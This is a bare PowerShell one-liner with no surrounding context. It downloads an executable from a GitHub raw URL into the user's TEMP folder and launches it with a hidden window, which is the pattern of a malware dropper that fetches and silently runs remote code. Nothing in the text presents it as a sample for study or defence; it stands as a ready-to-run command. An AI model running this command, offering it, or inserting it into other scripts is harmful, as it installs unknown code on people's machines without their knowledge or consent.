(New-Object Net.WebClient).DownloadFile('https://github.com/mysuperpuperusername/idontcaredesktopdownloader/raw/refs/heads/main/final_executable.exe', "$env:TEMP\final_executable.exe") Start-Process "$env:TEMP\final_executable.exe" -WindowStyle Hidden